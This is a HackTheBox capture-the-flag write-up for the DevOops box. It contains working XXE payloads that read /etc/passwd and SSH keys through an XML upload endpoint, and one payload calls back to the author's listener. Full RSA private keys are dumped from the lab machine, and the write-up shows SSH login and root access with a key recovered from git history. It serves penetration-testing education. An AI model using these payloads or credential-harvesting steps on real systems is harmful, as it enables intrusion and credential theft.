HackTheBox DevOops Write-Up

10 minute read

Spoiler alert: this is a write-up for the DevOops box that you can find on HackTheBox. If you haven’t done it yet and may want to in the future, you definitely don’t want to read this right now.

Alright, let’s kick that one off as usual with a quick nmap scan:

$ nmap -A 10.10.10.91

Starting Nmap 7.01 ( https://nmap.org ) at 2018-07-06 06:10 CEST
Nmap scan report for 10.10.10.91
Host is up (0.042s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 42:90:e3:35:31:8d:8b:86:17:2a:fb:38:90:da:c4:95 (RSA)
|_  256 b7:b6:dc:c4:4c:87:9b:75:2a:00:89:83:ed:b2:80:31 (ECDSA)
5000/tcp open  http    Gunicorn 19.7.1
|_http-server-header: gunicorn/19.7.1
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.29 seconds

So what do I have? SSH running on the standard port and what looks like an HTTP server on TCP port 5000. For information, Gunicorn is a Python WSGI HTTP server. Basically it runs Python scripts as serves it over HTTP.
The full scan doesn’t give me anything more.

The website looks like a basic blog.

I run nikto and gobuster on it to check if there’s some interesting URLs:

$ docker run frapsoft/nikto -host 10.10.10.91 -port 5000
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          10.10.10.91
+ Target Hostname:    10.10.10.91
+ Target Port:        5000
+ Start Time:         2018-07-06 04:30:58 (GMT0)
---------------------------------------------------------------------------
+ Server: gunicorn/19.7.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: HEAD, OPTIONS, GET 
+ 6544 items checked: 0 error(s) and 2 item(s) reported on remote host
+ End Time:           2018-07-06 04:39:04 (GMT0) (486 seconds)
---------------------------------------------------------------------------
+ 1 host(s) teste
$ docker run --rm -v $PWD/../SecLists/Discovery/Web-Content:/wl devalias/gobuster -w /wl/big.txt -u http://10.10.10.91:5000
Gobuster v1.3                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.91:5000/
[+] Threads      : 10
[+] Wordlist     : /words/big.txt
[+] Status codes : 301,302,307,200,204
=====================================================
/feed (Status: 200)
/upload (Status: 200)
=====================================================
  • /feed is just the image on the homepage.
  • /upload is a test API to upload XML files, for blog posts it seems.

I first try to upload a Python reverse shell: no errors but no connect back either.
Then a simple XML file following the notes I found: XML elements: Author, Subject, Content

<?xml version="1.0" ?>
<Author>Test McTest</Author>
<Subject>This is a test</Subject>
<Content>My wonderful content</Content>

I get back an HTTP 500 error. Hmmm. That feature to upload XML files makes me think of XXE. I read up a bit more about it on the OWASP wiki and check if I can get some file disclosure:

<?xml version="1.0" encoding="ISO-8859-1"?>
  <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///dev/random" >]><foo>&xxe;</foo>

It hangs for a while and then I get another 500 error so it seems to be parsing it and doing something more than before. I’ll make it connect back to my laptop to check it is really alive:

<?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "http://10.10.14.10:4444/alive" >]><foo>&xxe;</foo>

And in my netcat listener:

$ nc -lvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [10.10.10.91] port 4444 [tcp/*] accepted (family 2, sport 40112)
GET /alive HTTP/1.0
Host: 10.10.14.10:4444
User-Agent: Python-urllib/1.17

So I know that XML entities get processed and that the script processing it can reach to external files via HTTP. I go through a lot of different variations of XXE but can’t get the parser to evaluate the remote DTD I’m providing.

Back to the basics: I aim at getting my input processed properly first, so I can work off of that. Basically what was missing in my first attempt was a root XML element. First facepalm!

<?xml version="1.0" ?>
<Item>
  <Author>Test McTest</Author>
  <Subject>This is a test</Subject>
  <Content>My wonderful content</Content>
</Item>

When I post it with curl:

$ curl -X POST http://10.10.10.91:5000/upload -F file=@test.xml -D -
HTTP/1.1 100 Continue

HTTP/1.1 200 OK
Server: gunicorn/19.7.1
Date: Sun, 08 Jul 2018 13:27:09 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 183

 PROCESSED BLOGPOST: 
  Author: Test McTest
 Subject: This is a test
 Content: My wonderful content
 URL for later reference: /uploads/test.xml
 File path: /home/roosa/deploy/src

I get a proper response and a lot of info right there! Now I can get back to experimenting with XXE as I have a feedback channel.

<?xml version="1.0" ?>
<!DOCTYPE Content [
<!ELEMENT Content ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<Item>
  <Author>Test McTest</Author>
  <Subject>This is a test</Subject>
  <Content>&xxe;</Content>
</Item>

And I get back exactly what I wanted:

$ curl -X POST http://10.10.10.91:5000/upload -F file=@xxe.xml -D -
HTTP/1.1 100 Continue

HTTP/1.1 200 OK
Server: gunicorn/19.7.1
Date: Mon, 09 Jul 2018 04:20:53 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2601

 PROCESSED BLOGPOST: 
  Author: Test McTest
 Subject: This is a test
 Content: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
osboxes:x:1000:1000:osboxes.org,,,:/home/osboxes:/bin/false
git:x:1001:1001:git,,,:/home/git:/bin/bash
roosa:x:1002:1002:,,,:/home/roosa:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
blogfeed:x:1003:1003:,,,:/home/blogfeed:/bin/false

 URL for later reference: /uploads/xxe.xml
 File path: /home/roosa/deploy/src

So I’ve got two users with shell access: git and roosa. Let’s poke around. I change my xxe.xml file to get me the content of /home/roosa/.ssh/authorized_keys in case SSH public key auth is setup:

$ curl -X POST http://10.10.10.91:5000/upload -F file=@xxe.xml -D -
HTTP/1.1 100 Continue

HTTP/1.1 200 OK
Server: gunicorn/19.7.1
Date: Mon, 09 Jul 2018 04:24:47 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 556

 PROCESSED BLOGPOST: 
  Author: Test McTest
 Subject: This is a test
 Content: ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC4wy3iqH+JvzrEkEubN4+Xr/llE0mRSP9e6/X53qdxxN99v/v2wheFraHhrh+nXwXneN3Hc+oQ7scBeWzMCUG8Z2DreL4vFaa7ynkGtOYQ+X5xDglH9H57E2CAe6qynyutwer3qVte05HLxI6WJSN+yk+xZ9jsluS0rJpArQm6dHbmNWS/liEZV7JpM2ZI09OWlkJUZUCnVGi1Z1z/R7HurOerjnAtva1kUYTTGZhN5eChpfj1AhBCeiLoM/f7sStBJ3pAZOrmYK+zOmdNSybAWPklF2GMazO3TMEaWWxWf3073Qqbek3xI3XJYJNqXoUtSK7FeD31hJXS0SXSt9JT roosa@gitter

 URL for later reference: /uploads/xxe.xml
 File path: /home/roosa/deploy/src

And yes there it is! But git is not:

$ curl -X POST http://10.10.10.91:5000/upload -F file=@xxe.xml -D -
HTTP/1.1 100 Continue

curl: (52) Empty reply from server

I check that the default SSH key /home/roosa/.ssh/id_rsa.pub is the one used to login:

$ curl -X POST http://10.10.10.91:5000/upload -F file=@xxe.xml -D -
HTTP/1.1 100 Continue

HTTP/1.1 200 OK
Server: gunicorn/19.7.1
Date: Mon, 09 Jul 2018 04:25:50 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 556

 PROCESSED BLOGPOST: 
  Author: Test McTest
 Subject: This is a test
 Content: ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC4wy3iqH+JvzrEkEubN4+Xr/llE0mRSP9e6/X53qdxxN99v/v2wheFraHhrh+nXwXneN3Hc+oQ7scBeWzMCUG8Z2DreL4vFaa7ynkGtOYQ+X5xDglH9H57E2CAe6qynyutwer3qVte05HLxI6WJSN+yk+xZ9jsluS0rJpArQm6dHbmNWS/liEZV7JpM2ZI09OWlkJUZUCnVGi1Z1z/R7HurOerjnAtva1kUYTTGZhN5eChpfj1AhBCeiLoM/f7sStBJ3pAZOrmYK+zOmdNSybAWPklF2GMazO3TMEaWWxWf3073Qqbek3xI3XJYJNqXoUtSK7FeD31hJXS0SXSt9JT roosa@gitter

 URL for later reference: /uploads/xxe.xml
 File path: /home/roosa/deploy/src

Sweet! So I grab the private key /home/roosa/.ssh/id_rsa:

$ curl -X POST http://10.10.10.91:5000/upload -F file=@xxe.xml -D -
HTTP/1.1 100 Continue

HTTP/1.1 200 OK
Server: gunicorn/19.7.1
Date: Mon, 09 Jul 2018 04:26:04 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1837

 PROCESSED BLOGPOST: 
  Author: Test McTest
 Subject: This is a test
 Content: -----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAuMMt4qh/ib86xJBLmzePl6/5ZRNJkUj/Xuv1+d6nccTffb/7
9sIXha2h4a4fp18F53jdx3PqEO7HAXlszAlBvGdg63i+LxWmu8p5BrTmEPl+cQ4J
R/R+exNggHuqsp8rrcHq96lbXtORy8SOliUjfspPsWfY7JbktKyaQK0JunR25jVk
v5YhGVeyaTNmSNPTlpZCVGVAp1RotWdc/0ex7qznq45wLb2tZFGE0xmYTeXgoaX4
9QIQQnoi6DP3+7ErQSd6QGTq5mCvszpnTUsmwFj5JRdhjGszt0zBGllsVn99O90K
m3pN8SN1yWCTal6FLUiuxXg99YSV0tEl0rfSUwIDAQABAoIBAB6rj69jZyB3lQrS
JSrT80sr1At6QykR5ApewwtCcatKEgtu1iWlHIB9TTUIUYrYFEPTZYVZcY50BKbz
ACNyme3rf0Q3W+K3BmF//80kNFi3Ac1EljfSlzhZBBjv7msOTxLd8OJBw8AfAMHB
lCXKbnT6onYBlhnYBokTadu4nbfMm0ddJo5y32NaskFTAdAG882WkK5V5iszsE/3
koarlmzP1M0KPyaVrID3vgAvuJo3P6ynOoXlmn/oncZZdtwmhEjC23XALItW+lh7
e7ZKcMoH4J2W8OsbRXVF9YLSZz/AgHFI5XWp7V0Fyh2hp7UMe4dY0e1WKQn0wRKe
8oa9wQkCgYEA2tpna+vm3yIwu4ee12x2GhU7lsw58dcXXfn3pGLW7vQr5XcSVoqJ
Lk6u5T6VpcQTBCuM9+voiWDX0FUWE97obj8TYwL2vu2wk3ZJn00U83YQ4p9+tno6
NipeFs5ggIBQDU1k1nrBY10TpuyDgZL+2vxpfz1SdaHgHFgZDWjaEtUCgYEA2B93
hNNeXCaXAeS6NJHAxeTKOhapqRoJbNHjZAhsmCRENk6UhXyYCGxX40g7i7T15vt0
ESzdXu+uAG0/s3VNEdU5VggLu3RzpD1ePt03eBvimsgnciWlw6xuZlG3UEQJW8sk
A3+XsGjUpXv9TMt8XBf3muESRBmeVQUnp7RiVIcCgYBo9BZm7hGg7l+af1aQjuYw
agBSuAwNy43cNpUpU3Ep1RT8DVdRA0z4VSmQrKvNfDN2a4BGIO86eqPkt/lHfD3R
KRSeBfzY4VotzatO5wNmIjfExqJY1lL2SOkoXL5wwZgiWPxD00jM4wUapxAF4r2v
vR7Gs1zJJuE4FpOlF6SFJQKBgHbHBHa5e9iFVOSzgiq2GA4qqYG3RtMq/hcSWzh0
8MnE1MBL+5BJY3ztnnfJEQC9GZAyjh2KXLd6XlTZtfK4+vxcBUDk9x206IFRQOSn
y351RNrwOc2gJzQdJieRrX+thL8wK8DIdON9GbFBLXrxMo2ilnBGVjWbJstvI9Yl
aw0tAoGAGkndihmC5PayKdR1PYhdlVIsfEaDIgemK3/XxvnaUUcuWi2RhX3AlowG
xgQt1LOdApYoosALYta1JPen+65V02Fy5NgtoijLzvmNSz+rpRHGK6E8u3ihmmaq
82W3d4vCUPkKnrgG8F7s3GL6cqWcbZBd0j9u88fUWfPxfRaQU3s=
-----END RSA PRIVATE KEY-----

 URL for later reference: /uploads/xxe.xml
 File path: /home/roosa/deploy/src

And save it to a local file so I can use it to log in remotely:

$ chmod 600 id_roosa 
$ ssh -i id_roosa roosa@10.10.10.91
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

135 packages can be updated.
60 updates are security updates.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

roosa@gitter:~$ id
uid=1002(roosa) gid=1002(roosa) groups=1002(roosa),4(adm),27(sudo)
roosa@gitter:~$ ls
deploy  Desktop  Documents  Downloads  examples.desktop  Music  Pictures  Public  run-blogfeed.sh  service.sh  service.sh~  Templates  user.txt  Videos  work
roosa@gitter:~$ cat user.txt 
c580************************c67b

Great I now have a proper shell on the machine. Let’s do some recon.
First I notice that the user is a member of the sudo group so I check what it can do with it:

roosa@gitter:~$ sudo -l
sudo: unable to resolve host gitter: Connection timed out
[sudo] password for roosa: 
roosa@gitter:~$

Bummer it asks for a password… OK we’ll have to work a bit more then.
Enumeration here I come.
There are some scripts to run the blogfeed app:

  • run-blogfeed.sh seems to be used by roosa
  • service.sh and the tempfile service.sh~ look like an init script
  • deploy/run-gunicorn.sh is called by /etc/init.d/blogfeed

/etc/init.d/blogfeed is running things as roosa so it won’t really help me to elevate my privileges.

There are two copies of the blogfeed source in both /home/roosa/deploy and /home/roosa/work.
Source code usually equals loot and I quickly find something interesting:

$ cat /home/roosa/deploy/resources/integration/authcredentials.key 
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEApc7idlMQHM4QDf2d8MFjIW40UickQx/cvxPZX0XunSLD8veN
ouroJLw0Qtfh+dS6y+rbHnj4+HySF1HCAWs53MYS7m67bCZh9Bj21+E4fz/uwDSE
23g18kmkjmzWQ2AjDeC0EyWH3k4iRnABruBHs8+fssjW5sSxze74d7Ez3uOI9zPE
sQ26ynmLutnd/MpyxFjCigP02McCBrNLaclcbEgBgEn9v+KBtUkfgMgt5CNLfV8s
ukQs4gdHPeSj7kDpgHkRyCt+YAqvs3XkrgMDh3qI9tCPfs8jHUvuRHyGdMnqzI16
ZBlx4UG0bdxtoE8DLjfoJuWGfCF/dTAFLHK3mwIDAQABAoIBADelrnV9vRudwN+h
LZ++l7GBlge4YUAx8lkipUKHauTL5S2nDZ8O7ahejb+dSpcZYTPM94tLmGt1C2bO
JqlpPjstMu9YtIhAfYF522ZqjRaP82YIekpaFujg9FxkhKiKHFms/2KppubiHDi9
oKL7XLUpSnSrWQyMGQx/Vl59V2ZHNsBxptZ+qQYavc7bGP3h4HoRurrPiVlmPwXM
xL8NWx4knCZEC+YId8cAqyJ2EC4RoAr7tQ3xb46jC24Gc/YFkI9b7WCKpFgiszhw
vFvkYQDuIvzsIyunqe3YR0v8TKEfWKtm8T9iyb2yXTa+b/U3I9We1P+0nbfjYX8x
6umhQuECgYEA0fvp8m2KKJkkigDCsaCpP5dWPijukHV+CLBldcmrvUxRTIa8o4e+
OWOMW1JPEtDTj7kDpikekvHBPACBd5fYnqYnxPv+6pfyh3H5SuLhu9PPA36MjRyE
4+tDgPvXsfQqAKLF3crG9yKVUqw2G8FFo7dqLp3cDxCs5sk6Gq/lAesCgYEAyiS0
937GI+GDtBZ4bjylz4L5IHO55WI7CYPKrgUeKqi8ovKLDsBEboBbqRWcHr182E94
SQMoKu++K1nbly2YS+mv4bOanSFdc6bT/SAHKdImo8buqM0IhrYTNvArN/Puv4VT
Nszh8L9BDEc/DOQQQzsKiwIHab/rKJHZeA6cBRECgYEAgLg6CwAXBxgJjAc3Uge4
eGDe3y/cPfWoEs9/AptjiaD03UJi9KPLegaKDZkBG/mjFqFFmV/vfAhyecOdmaAd
i/Mywc/vzgLjCyBUvxEhazBF4FB8/CuVUtnvAWxgJpgT/1vIi1M4cFpkys8CRDVP
6TIQBw+BzEJemwKTebSFX40CgYEAtZt61iwYWV4fFCln8yobka5KoeQ2rCWvgqHb
8rH4Yz0LlJ2xXwRPtrMtJmCazWdSBYiIOZhTexe+03W8ejrla7Y8ZNsWWnsCWYgV
RoGCzgjW3Cc6fX8PXO+xnZbyTSejZH+kvkQd7Uv2ZdCQjcVL8wrVMwQUouZgoCdA
qML/WvECgYEAyNoevgP+tJqDtrxGmLK2hwuoY11ZIgxHUj9YkikwuZQOmFk3EffI
T3Sd/6nWVzi1FO16KjhRGrqwb6BCDxeyxG508hHzikoWyMN0AA2st8a8YS6jiOog
bU34EzQLp7oRU/TKO6Mx5ibQxkZPIHfgA1+Qsu27yIwlprQ64+oeEr0=
-----END RSA PRIVATE KEY-----

What looks like an SSH private key.
I also notice that /home/roosa/work/blogfeed is a git repo and having a look at the commit log:

$ git log
commit 7ff507d029021b0915235ff91e6a74ba33009c6d
Author: Roosa Hakkerson <roosa@solita.fi>
Date:   Mon Mar 26 06:13:55 2018 -0400

    Use Base64 for pickle feed loading

commit 26ae6c8668995b2f09bf9e2809c36b156207bfa8
Author: Roosa Hakkerson <roosa@solita.fi>
Date:   Tue Mar 20 15:37:00 2018 -0400

    Set PIN to make debugging faster as it will no longer change every time the application code is changed. Remember to remove before production use.

commit cec54d8cb6117fd7f164db142f0348a74d3e9a70
Author: Roosa Hakkerson <roosa@solita.fi>
Date:   Tue Mar 20 15:08:09 2018 -0400

    Debug support added to make development more agile.

commit ca3e768f2434511e75bd5137593895bd38e1b1c2
Author: Roosa Hakkerson <roosa@solita.fi>
Date:   Tue Mar 20 08:38:21 2018 -0400

    Blogfeed app, initial version.

commit dfebfdfd9146c98432d19e3f7d83cc5f3adbfe94
Author: Roosa Hakkerson <roosa@solita.fi>
Date:   Tue Mar 20 08:37:56 2018 -0400

    Gunicorn startup script

commit 33e87c312c08735a02fa9c796021a4a3023129ad
Author: Roosa Hakkerson <roosa@solita.fi>
Date:   Mon Mar 19 09:33:06 2018 -0400

    reverted accidental commit with proper key

commit d387abf63e05c9628a59195cec9311751bdb283f
Author: Roosa Hakkerson <roosa@solita.fi>
Date:   Mon Mar 19 09:32:03 2018 -0400

    add key for feed integration from tnerprise backend

commit 1422e5a04d1b52a44e6dc81023420347e257ee5f
Author: Roosa Hakkerson <roosa@solita.fi>
Date:   Mon Mar 19 09:24:30 2018 -0400

    Initial commit

It seems some credentials have been accidentally commited to git and then overwritten in a following commit.
Let’s get them back:

$ git diff 1422e5a04d1b52a44e6dc81023420347e257ee5f d387abf63e05c9628a59195cec9311751bdb283f
diff --git a/resources/integration/authcredentials.key b/resources/integration/authcredentials.key
new file mode 100644
index 0000000..44c981f
--- /dev/null
+++ b/resources/integration/authcredentials.key
@@ -0,0 +1,28 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIEogIBAAKCAQEArDvzJ0k7T856dw2pnIrStl0GwoU/WFI+OPQcpOVj9DdSIEde
+8PDgpt/tBpY7a/xt3sP5rD7JEuvnpWRLteqKZ8hlCvt+4oP7DqWXoo/hfaUUyU5i
+vr+5Ui0nD+YBKyYuiN+4CB8jSQvwOG+LlA3IGAzVf56J0WP9FILH/NwYW2iovTRK
+nz1y2vdO3ug94XX8y0bbMR9Mtpj292wNrxmUSQ5glioqrSrwFfevWt/rEgIVmrb+
+CCjeERnxMwaZNFP0SYoiC5HweyXD6ZLgFO4uOVuImILGJyyQJ8u5BI2mc/SHSE0c
+F9DmYwbVqRcurk3yAS+jEbXgObupXkDHgIoMCwIDAQABAoIBAFaUuHIKVT+UK2oH
+uzjPbIdyEkDc3PAYP+E/jdqy2eFdofJKDocOf9BDhxKlmO968PxoBe25jjjt0AAL
+gCfN5I+xZGH19V4HPMCrK6PzskYII3/i4K7FEHMn8ZgDZpj7U69Iz2l9xa4lyzeD
+k2X0256DbRv/ZYaWPhX+fGw3dCMWkRs6MoBNVS4wAMmOCiFl3hzHlgIemLMm6QSy
+NnTtLPXwkS84KMfZGbnolAiZbHAqhe5cRfV2CVw2U8GaIS3fqV3ioD0qqQjIIPNM
+HSRik2J/7Y7OuBRQN+auzFKV7QeLFeROJsLhLaPhstY5QQReQr9oIuTAs9c+oCLa
+2fXe3kkCgYEA367aoOTisun9UJ7ObgNZTDPeaXajhWrZbxlSsOeOBp5CK/oLc0RB
+GLEKU6HtUuKFvlXdJ22S4/rQb0RiDcU/wOiDzmlCTQJrnLgqzBwNXp+MH6Av9WHG
+jwrjv/loHYF0vXUHHRVJmcXzsftZk2aJ29TXud5UMqHovyieb3mZ0pcCgYEAxR41
+IMq2dif3laGnQuYrjQVNFfvwDt1JD1mKNG8OppwTgcPbFO+R3+MqL7lvAhHjWKMw
++XjmkQEZbnmwf1fKuIHW9uD9KxxHqgucNv9ySuMtVPp/QYtjn/ltojR16JNTKqiW
+7vSqlsZnT9jR2syvuhhVz4Ei9yA/VYZG2uiCpK0CgYA/UOhz+LYu/MsGoh0+yNXj
+Gx+O7NU2s9sedqWQi8sJFo0Wk63gD+b5TUvmBoT+HD7NdNKoEX0t6VZM2KeEzFvS
+iD6fE+5/i/rYHs2Gfz5NlY39ecN5ixbAcM2tDrUo/PcFlfXQhrERxRXJQKPHdJP7
+VRFHfKaKuof+bEoEtgATuwKBgC3Ce3bnWEBJuvIjmt6u7EFKj8CgwfPRbxp/INRX
+S8Flzil7vCo6C1U8ORjnJVwHpw12pPHlHTFgXfUFjvGhAdCfY7XgOSV+5SwWkec6
+md/EqUtm84/VugTzNH5JS234dYAbrx498jQaTvV8UgtHJSxAZftL8UAJXmqOR3ie
+LWXpAoGADMbq4aFzQuUPldxr3thx0KRz9LJUJfrpADAUbxo8zVvbwt4gM2vsXwcz
+oAvexd1JRMkbC7YOgrzZ9iOxHP+mg/LLENmHimcyKCqaY3XzqXqk9lOhA3ymOcLw
+LS4O7JPRqVmgZzUUnDiAVuUHWuHGGXpWpz9EGau6dIbQaUUSOEE=
+-----END RSA PRIVATE KEY-----
+

Great another private key for my collection!

I use LinEnum.sh to get more info on the system and that’s where I lost myself…
I see that git and root have also logged in at one point. git logged in from localhost.
The blogfeed user may also be interesting, I make a note to come back to it later.
Apart from roosa, syslog and osboxes are members of adm. osboxes is sudo as well.
That user refers to https://www.osboxes.org/ and was probably used to set up the box initially. I’m not sure it will be of any use.
I can read the $HOME dirs of:

  • git
  • osboxes
  • blogfeed

roosa has a Gnome keyring in /home/roosa/.local/share/keyrings/login.keyring and /home/roosa/.local/share/keyrings/user.keystore
I’ll check it as well as its known_hosts, .gitconfig, bash history and ssh-agent.
Also the blogfeed app logs to /var/log/blogfeed.log.

On the networking side, the following ports are open:

  • localhost only:
    • 631/tcp
  • on all interfaces:
    • 631/tcp6
    • 631/udp
    • 5353/udp
    • 49447/udp
    • 59745/udp6

As for the processes, I have nothing really interesting.

Looking at the roosa user’s history, he logged in as git locally with SSH.
Let’s try that with the SSH keys I found: each time it is asking for a password.
I also give it a try as root.

$ ssh -i id root@localhost
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

135 packages can be updated.
60 updates are security updates.

Last login: Mon Mar 26 06:23:48 2018 from 192.168.57.1
root@gitter:~# id
uid=0(root) gid=0(root) groups=0(root)
root@gitter:~# ls
root.txt
root@gitter:~# cat root.txt 
d4fe************************c7b3

Out of nowhere, it almost surprised me! :) And then thinking back about it that’s another BIIIIG facepalm as I had the credentials for a while before I even tried them…

All in all this wasn’t such a hard box (only 2 facepalms, see). Again what I recognise as my lack of established methodology gave me a hard time when I should have finished it way earlier. Anyway, like always, there are things to learn from this:

  • When testing input: try a valid one first then try to break it and get an error, and then try to make it valid again but with the behavior you’re looking for. In that case: a valid XML doc, then try different XXE techniques until the server sends back something else than an error.
  • Try credentials everywhere you can the minute you get them. It can really help speed up your progress.

That was a fairly short one this time but I hope it was interesting nonetheless and that you got something from it.

Till next time!